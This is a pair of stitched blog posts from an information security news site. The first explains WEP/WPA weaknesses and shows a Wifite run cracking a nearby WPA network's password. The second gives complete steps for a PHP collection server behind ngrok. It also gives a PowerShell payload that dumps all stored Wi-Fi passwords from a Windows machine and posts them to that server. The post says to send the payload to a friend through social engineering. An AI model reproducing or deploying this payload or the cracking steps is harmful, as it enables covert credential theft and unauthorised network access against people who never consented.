Wireless network which enables end-point devices to communicate with internet by connecting to an AP device. Wiresless device are also referred as WLAN devices.

Accessing Wireless Networks

You will need wireless enabled devices such as smartphones, laptops, tablets to connect wireless networks. Today you will see most devices comes with wireless networks. For connecting with wireless network you need to go Wifi settings in your mobile, laptops. Tap on the listed wifi networks, if WLAN is asking for password. Enter password. If wireless networks are open. Simply connect to the Wifi networks.

Wireless Authentication

There are various types of wireless authentication. According to ethical hacking researcher of international institute of cyber security These authentication are used to protect Wifi networks from attackers. Mainly there are WEP, WPA, WPA2, WPS authentications.

WEP (Wired Equivalent Privacy)

WEP was developed by IEEE 802.111 wlan standards. WEP was developed to provide security equal to wired networks. WEP encrypts data which is transmitted over the network to keep WEP enable network sage from attackers.

WEP Authentication

• WEP provides two types of authentication :-
  • Open System Authentication (OSA) – This method grant access to base station authentication requested based on configured policy.
  • Share Key Authentication (SKA) – From here encrypted challenges are requested for access. The base station encrypts the challenge with its key responds. If the encrypted challenge matches AP value, then access is granted.

WEP Security Flaw

• Integrity Checked Using CRC (Cycle Redundancy Check) – CRC32 is comprimssed by capturing at least two packets. The bits are in the encrypted stream & checksum are modfied by attacker. So that Packed is accepted by authenticating the system which leads to unauthorised access to the network.
• WEP uses RC4 Encryption using Stream Ciphers – Steam cyphers are made up of initial value (IV) & secret key. The length of initial value is 24 Bits long with secret key it can be either 40 bits or 104 bits long. The lower value & secret key makes easy to crack it. Weaker Initial Values Combinations do not Encrypt Sufficiently. This makes more vulnerable to attack.
• WEP is based on Password – In WEP, key managment is poorly implemented. Changing keys on large networks is challenging becuase WEP does not provide an centrallized key managment system. Inital values can be reused for cracking WEP authentication.

WPA

WPA security authentication which is widely used by many orgranizations. WPA was developed by wifi alliance in response to security flaw in WEP. WPA ecrypts data on 802.11 wlans. It uses higher inintial value48 bits whereas WEP uses 24 bits. WPA also uses temporal keys to encrypt packets.

WPA Security Flaw

• WPA is vulnerable to denial of service attacks. This authentication uses pre-shared keys which uses passphrases. Week passphrases are mostly vulnerable to dictionary attacks.

Cracking Wifi passwords is very popular among pentesters/ researchers. Earlier we have shown many methods to crack Wifi passwords. Cracking into the networks has long history. Since new authentication has came to secure the Wifi Access Point. Still there are many router which lacks for providing security. Today we will show popular methods of Wifi cracking. Another tools like hashcat which is mostly used in dictionary attacks, bruteforce attacks.

Below you will see another methods for wifi cracking. It involves automated & mannual way.

Cain & Abel

Cain & abel is most popular software used in various activities. Its an password recovery tool which is used in recovering different types of passwords. It can recover passwords such as – network packet sniffing, different hashes, dictionary attacks, brute force.

• Above you can see that stored windows passwordsj through cain & abel.

Wifite

Wifite makes the Wifi cracking in automated way. You don’t have to enter each query for capturing handshake or de-authentication of clients. After starting the wifite, it will scan for the available Wifi networks. Then you have to select the target by the number. After selecting the target. Wifite will automatically capture the handshake & will de-auth the connected clients to the AP. This tool makes easy for wifi cracking. You can also checkout another methods for wifi cracking.

• For testing we have used Kali Linux 2019.1 amd64. Type git clone https://github.com/derv82/wifite2.git
• Type cd wifite2/

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/derv82/wifite2.git
 Cloning into 'wifite2'…
 remote: Enumerating objects: 1934, done.
 remote: Total 1934 (delta 0), reused 0 (delta 0), pack-reused 1934
 Receiving objects: 100% (1934/1934), 1.09 MiB | 869.00 KiB/s, done.
 Resolving deltas: 100% (1413/1413), done.
root@kali:/home/iicybersecurity/Downloads# cd wifite2/

• Type ls && type python wifite.py
• Tbis tool is using inbuilt wordlist – wordlist-top4800-probable.txt. You can add more keywords according to your requriment of cracking wifi passoword.

root@kali:/home/iicybersecurity/Downloads/wifite2# ls
 bin         EVILTWIN.md  MANIFEST.in  README.md    setup.cfg  tests    wifite     wordlist-top4800-probable.txt
 Dockerfile  LICENSE      PMKID.md     runtests.sh  setup.py   TODO.md  Wifite.py
 root@kali:/home/iicybersecurity/Downloads/wifite2# python Wifite.py

   .               .
 .´  ·  .     .  ·  `.  wifite 2.2.5
 :  :  :  (¯)  :  :  :  automated wireless auditor
 `.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
   `     /¯¯¯\     ´


 [+] Using wlan0mon already in monitor mode

   NUM                      ESSID   CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1              geek_connect    11   WPA   42db   yes    1
     2         Pankaj@9212458712     1   WPA   31db   yes
     3               hidden_user     2   WPA   29db    no    3
     4                 DIRECT-hn     6   WPA   28db   yes
     5       (22:15:00:33:44:78)    11   WPA   27db   yes
     6                    naidus     6   WPA   27db    no
     7                   Excitel     6   WPA   22db    no
     8                       Cbi    10   WPA   21db   yes    1
     9       (34:12:24:67:4D:YK)     6   WPA   21db   yes
    10              Worldview@37     1   WPA   20db    no
    11               Excitel@43      7   WPA   16db    no
    12        Worldview@tanpreet    13   WPA   13db    no
    13                     Bunty     4   WPA   12db    no
    14              MohanLalchug    10   WPA   11db  lock
    15                  S.K.Tuli    11   WPA   10db    no
    16       (55:RF:B5:23:C5:90)     1   WPA    8db    no
    17       Rajat@wvc9312408388     1   WPA    7db    no

• Press Ctrl+C
• Enter desired target. here we will type 1

[+] select target(s) (1-17) separated by commas, dashes or all: 1
 + Starting attacks against C8:D7:79:50:C1:B3 (geek_connect)
  [+] geek_connect (51db) WPS Pixie-Dust: [--1s] Failed: Timeout after 300 seconds
  [+] geek_connect (50db) WPS PIN Attack: 4m55s PINs:1 Sending EAPOL (Timeouts:25, Fails:1)
  [+] geek_connect (51db) WPS PIN Attack: 5m2s PINs:1 Sending EAPOL (Timeouts:25, Fails:1)
  [+] geek_connect (46db) WPS PIN Attack: 5m3s PINs:1 Sending EAPOL (Timeouts:25, Fails:1)
  [+] geek_connect (46db) WPS PIN Attack: 5m3s PINs:1 Sending EAPOL (Timeouts:25, Fails:1)
 [+] geek_connect (47db) WPS PIN Attack: 5m5s PINs:1 Sending EAPOL (Timeouts:26, Fails:1) ^C
  [!] Interrupted
 [+] 2 attack(s) remain

• Press Ctrl + C for skipping the wps attack. This tool crack wpa2/wpa & wps passwords. Currently we are testing on wpa2.
• So we will press Ctrl + C

 [+] Do you want to continue attacking, or exit (C, e)? c  
 [+] geek_connect (42db) PMKID CAPTURE: Failed to capture PMKID
 [+] geek_connect (47db) WPA Handshake capture: Discovered new client: TU:QB:RT:46:AS:QW
 [+] geek_connect (47db) WPA Handshake capture: Discovered new client: 70:AF:EE:3Y:VB:MN
  [+] geek_connect (48db) WPA Handshake capture: Captured handshake
  [+] saving copy of handshake to hs/handshake_geekconnect_ 23:67:WW:EE:C1:WR _2019-09-14T06-50-06.cap saved
 [+] analysis of captured handshake file:
  [!]   tshark: .cap file does not contain a valid handshake
  [+]    pyrit: .cap file contains a valid handshake for  23:67:WW:EE:C1:WR  (geek_connect)
  [+] cowpatty: .cap file contains a valid handshake for (geek_connect)
  [!] aircrack: .cap file does not contain a valid handshake
 [+] Cracking WPA Handshake: Running aircrack-ng with wordlist-top4800-probable.txt wordlist
  [+] Cracking WPA Handshake: 97.67% ETA: 0s @ 2156.9kps (current key: fantasy1)
  [+] Cracked WPA Handshake PSK: rootuser
 [+]   Access Point Name: geek_connect
  [+]  Access Point BSSID: 23:67:WW:EE:C1:WR
  [+]          Encryption: WPA
  [+]      Handshake File: hs/handshake_geekconnect_ 23:67:WW:EE:C1:WR _2019-09-14T06-50-06.cap
  [+]      PSK (password): rootuser
  [+] saved crack result to cracked.txt (1 total)
  [+] Finished attacking 1 target(s), exiting 

• Above you can see the password which have been cracked using wifite tool. This tool consumer attacker time.
• After gathering the password attacker can used session hijacking methods to spread malwares.

• Wifite saves the .cap file in Wifite directory. You can also use the .cap file for cracking wifi password using direct aircrack-ng explained below.

root@kali:/home/iicybersecurity/Downloads/wifite2/hs# ls
 handshake_geekconnect_C8-D7-79-50-C1-B3_2019-09-14T06-50-06.cap

• Opening the above file in wireshark shows the eapol packets transmission.

Another Way of Wifi Cracking

Aircrack-ng

Aircrack-ng is the most popular technique which is often taught in many courses of ethical hacking & widely used in Wifi cracking. Aircrack-ng captures the handshake & de-auth the selected clients which are connected to the target bssid. Then aircrack-ng uses wordlist for cracking the password of the AP. This method involves mainly of capturing the handshake. Depend on the de-auth of clients, this attack is used. The attack is most commonly used in public places. Air-crack-ng is comes pre-installed with many linux distros.

The post Different Ways for Wifi Cracking appeared first on Information Security Newspaper | Hacking News.

We will use Userland applications which allows to install Kali Linux on android devices without rooting. Aircrack-ng will not work in Userland as it required device root access.

So here we will start php server on hacker mobile & ngrok is used for forwarding. And will create an payload to execute in VICTIM Windows OS.

ON HACKER MOBILE

• For testing we will use Xiaomi Redmi Note 4. You have install
  • UserLand – https://play.google.com/store/apps/details?id=tech.ula&hl=en_IN
  • ConnectBot – https://play.google.com/store/apps/details?id=org.connectbot&hl=en_IN
• These applications will be used to gather Wifi Password.
• As per the ethical hacking researcher of International Institute of Cyber Security, Userland will allow us to install different Linux distros on mobile. So here we will install Kali Linux & connect it will ConnectBot.
• Click on Kali Linux enter password iicybersecurity@12345. You can write any password.

• Type su && sudo apt-get update && sudo apt-get install net-tools
• Type sudo apt-get install unzip && apt-mark build apache*

• Then type sudo apt-get install php && sudo apt-get install screen

• Type screen then again type screen

• Type mkdir phpServer && type cd phpServer
• Type nano index.php and this below code.

<html>
 <title> PHP Server </title>
  <body>
  <h1> It works!</h1>
  <?php
  $file = date("y-h-m") . ".credz" ;
  file_put_contents ($file , file_get_contents("php://input"));
  ?>
  </body>
</html>

• Type php -S 0.0.0.0:80 &
• Type ps -ef to check whether php is running or not.

• Go to https://dashboard.ngrok.com/signup create a new account. After then login through your account. Go to Auth & copy the auth token.

• Type sudo apt-get install wget && type wget https://bin.equinox.io/a/nmkK3DkqZEB/ngrok-2.2.8-linux-arm64.zip
• Now type unzip ngrok-2.2.8-linux-arm64.zip, this will extract ngrok file in the same directory.

• Type ./ngrok authtoken <Your authtoken>

• Type screen
• Then type ./ngrok http 80
• Now to run this ngrok in background press key combination of Ctrl+a+n, this will move the ngrok command in background and return to the shell prompt.
• According of the ethical hacking researcher of International Institute of Cyber Security this key combination can change on the mobile model.

• Save the below code in .bat extension. For that you can use WPS office application for saving the bat file. Download the WPS office application : https://play.google.com/store/apps/details?id=cn.wps.moffice_eng&hl=en
• Open application Click on + & then click on Document. Paste the below code in WPS office document editor. Save the file in payload.txt
• Open file manager. rename file to payload.txt to payload.bat

Add-Type -AssemblyName System.Web;

$ngrokServer = "https://SUBDOMAIN.ngrok.io/index.php";

foreach ($path in [System.IO.Directory]::EnumerateFiles("C:\ProgramData\Microsoft\Wlansvc\Profiles","*.xml","AllDirectories")) {

  try {
    $oXml = New-Object System.XML.XMLDocument;
    $oXml.Load($path);
    $ssid = $oXml.WLANProfile.SSIDConfig.SSID.Name;
    $netinfo = netsh.exe wlan show profiles name="$ssid" key=clear;
    $pass = (($netinfo | Select-String -Pattern "Key Content") -split ":")[1].Trim();
    $sendData += "SSID: " + ($ssid) + "`n" + "PASSWORD: " + ($pass) + "`n`n";
  } catch {}

}

Invoke-WebRequest -Uri $ngrokServer -Method 'POST' -Body $sendData;

• Now you make any social engineering trick to send this payload to your friend. Once your friend open the payload in Windows computer (VICTIM machine). Above code is powershell code which when run in powershell will extract all password in VICTIM system.
• As commented by digital forensics expert of International Institute of Cyber Security, came code is used in some malware with powershell to get all passwords of the VICTIM system

• You will get all the stored Wifi passwords to your android device.

• Above you can see all stored passwords of Wifi in /home/iicybersecurity/phpServer/ directory.
• For more information on others ways to hack wifi passwords please follow this youtube link.

The post Hack Wifi Without Rooting Android Devices appeared first on Information Security Newspaper | Hacking News.